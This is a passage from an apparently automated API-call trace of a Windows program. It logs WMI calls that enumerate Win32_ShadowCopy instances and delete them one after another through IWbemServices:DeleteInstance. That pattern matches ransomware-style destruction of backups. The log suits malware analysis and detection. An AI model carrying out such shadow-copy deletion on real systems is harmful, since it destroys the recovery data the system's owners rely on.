[1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0135.501] IUnknown:AddRef (This=0x1be58420) returned 0x3 [0135.501] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0135.501] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be58428) returned 0x0 [0135.502] IMarshal:GetUnmarshalClass (in: This=0x1be58428, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0135.502] IUnknown:Release (This=0x1be58428) returned 0x3 [0135.502] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0135.502] IUnknown:AddRef (This=0x1be58420) returned 0x4 [0135.502] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0135.502] IUnknown:Release (This=0x1be58420) returned 0x3 [0135.502] IUnknown:Release (This=0x1be58420) returned 0x2 [0135.502] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0135.502] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0135.502] IUnknown:AddRef (This=0x1be58420) returned 0x3 [0135.502] IUnknown:QueryInterface (in: This=0x1be58420, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be58420) returned 0x0 [0135.502] IUnknown:Release (This=0x1be58420) returned 0x3 [0135.503] IUnknown:Release (This=0x1be58420) returned 0x2 [0135.503] IUnknown:Release (This=0x1be58420) returned 0x1 [0135.503] CoTaskMemFree (pv=0x16a900) [0135.503] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0135.503] IUnknown:AddRef (This=0x1be58420) returned 0x2 [0135.503] IWbemClassObject:Get (in: This=0x1be58420, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0135.503] IWbemClassObject:Get (in: This=0x1be58420, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0135.503] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x53 [0135.503] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0135.503] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0135.503] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0135.504] IUnknown:Release (This=0x142498) returned 0x1 [0135.504] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be522e0) returned 0x0 [0135.504] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be522e0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0135.504] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be522e0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be530d0) returned 0x0 [0135.505] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be530d0) returned 0x0 [0135.505] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0135.505] WbemDefPath:IUnknown:AddRef (This=0x1be530d0) returned 0x3 [0135.505] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0135.505] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936fe0) returned 0x0 [0135.505] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936fe0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0135.505] WbemDefPath:IUnknown:Release (This=0x1b936fe0) returned 0x3 [0135.505] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0135.505] WbemDefPath:IUnknown:AddRef (This=0x1be530d0) returned 0x4 [0135.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0135.506] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x3 [0135.506] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x2 [0135.506] WbemDefPath:IUnknown:Release (This=0x1be522e0) returned 0x0 [0135.506] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x1 [0135.506] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0135.506] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0135.506] WbemDefPath:IUnknown:AddRef (This=0x1be530d0) returned 0x2 [0135.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be530d0) returned 0x0 [0135.507] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x2 [0135.507] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x1 [0135.507] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0135.507] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0135.507] WbemDefPath:IUnknown:AddRef (This=0x1be530d0) returned 0x2 [0135.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be530d0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be530d0) returned 0x0 [0135.507] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x2 [0135.507] WbemDefPath:IUnknown:AddRef (This=0x1be530d0) returned 0x3 [0135.507] WbemDefPath:IWbemPath:SetText (This=0x1be530d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0135.508] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x2 [0135.508] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0135.508] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.509] IWbemClassObject:Get (in: This=0x1be58420, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0135.509] SysStringLen (param_1="root\\cimv2") returned 0xa [0135.509] IWbemClassObject:Get (in: This=0x1be58420, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0135.509] SysStringLen (param_1="root\\cimv2") returned 0xa [0135.509] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0135.509] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.509] IWbemClassObject:Get (in: This=0x1be58420, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0135.509] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0135.509] IWbemClassObject:Get (in: This=0x1be58420, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0135.510] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0135.510] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be530d0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0135.510] WbemDefPath:IWbemPath:GetText (in: This=0x1be530d0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0135.510] WbemDefPath:IWbemPath:GetText (in: This=0x1be530d0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0135.510] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0135.510] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0135.510] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.510] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0135.510] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0135.511] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0135.511] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0135.511] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0135.511] IWbemClassObject:Get (in: This=0x1be58420, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0135.511] WbemDefPath:IWbemPath:GetText (in: This=0x1be530d0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0135.511] WbemDefPath:IWbemPath:GetText (in: This=0x1be530d0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0135.511] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0136.852] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0136.852] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be59a70, puReturned=0x1c90de18*=0x1) returned 0x0 [0136.853] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be59a70) returned 0x0 [0136.853] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0136.853] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0136.853] IUnknown:AddRef (This=0x1be59a70) returned 0x3 [0136.854] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0136.854] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be59a78) returned 0x0 [0136.854] IMarshal:GetUnmarshalClass (in: This=0x1be59a78, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0136.854] IUnknown:Release (This=0x1be59a78) returned 0x3 [0136.854] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0136.854] IUnknown:AddRef (This=0x1be59a70) returned 0x4 [0136.854] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0136.854] IUnknown:Release (This=0x1be59a70) returned 0x3 [0136.854] IUnknown:Release (This=0x1be59a70) returned 0x2 [0136.854] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0136.854] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0136.854] IUnknown:AddRef (This=0x1be59a70) returned 0x3 [0136.855] IUnknown:QueryInterface (in: This=0x1be59a70, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be59a70) returned 0x0 [0136.855] IUnknown:Release (This=0x1be59a70) returned 0x3 [0136.855] IUnknown:Release (This=0x1be59a70) returned 0x2 [0136.855] IUnknown:Release (This=0x1be59a70) returned 0x1 [0136.855] CoTaskMemFree (pv=0x16a900) [0136.855] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0136.855] IUnknown:AddRef (This=0x1be59a70) returned 0x2 [0136.855] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0136.855] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0136.855] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x53 [0136.855] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0136.856] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0136.856] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0136.856] IUnknown:Release (This=0x142498) returned 0x1 [0136.856] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be523a0) returned 0x0 [0136.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be523a0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0136.857] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be523a0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53190) returned 0x0 [0136.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53190) returned 0x0 [0136.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0136.857] WbemDefPath:IUnknown:AddRef (This=0x1be53190) returned 0x3 [0136.857] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0136.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b937120) returned 0x0 [0136.857] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b937120, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 